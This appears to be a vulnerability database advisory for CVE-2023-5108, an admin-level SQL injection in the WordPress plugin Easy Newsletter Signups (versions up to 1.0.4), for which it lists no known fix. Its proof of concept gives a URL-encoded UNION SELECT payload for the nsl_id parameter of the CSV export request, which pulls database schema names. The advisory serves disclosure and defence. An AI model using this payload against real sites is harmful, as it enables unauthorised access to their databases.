Easy Newsletter Signups <= 1.0.4 – Admin+ SQLi | CVE 2023-5108 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

1. From the "Easy Newsletter Signups", select an email address and then click "Export to CSV"
2. Intercept the request and add the following for the `nsl_id` parameter:

`%5B%5D=265%20UNION%20ALL%20SELECT%20NULL%2cNULL%2cNULL%2cNULL%2cNULL%2cCONCAT(schema_name)%2cNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-`

3. See the SQLi in the response.

Affects Plugins

easy-newsletter-signups

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Karolis Narvilas

Submitter

Karolis Narvilas

Submitter website

https://prisminfosec.com

Verified

Yes

WPVDB ID

1b277929-e88b-4ab6-9190-526e75f5ce7a

Timeline

Publicly Published

2023-11-13 (about 6 months ago)

Added

2023-11-13 (about 6 months ago)

Last Updated

2023-11-13 (about 6 months ago)

Other

Published

Title

Published

2014-08-01

Title

BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections

Published

2021-09-02

Title

Meow Gallery < 4.1.9 - Contributor+ SQL Injection

Published

2022-01-07

Title

Paid Memberships Pro < 2.6.7 - Unauthenticated Blind SQL Injection

Published

2014-11-05

Title

WordPress Store Locator 2.3-3.11 - SQL Injection

Published

2014-08-01

Title

All Video Gallery - Multiple SQL Injection Vulnerabilities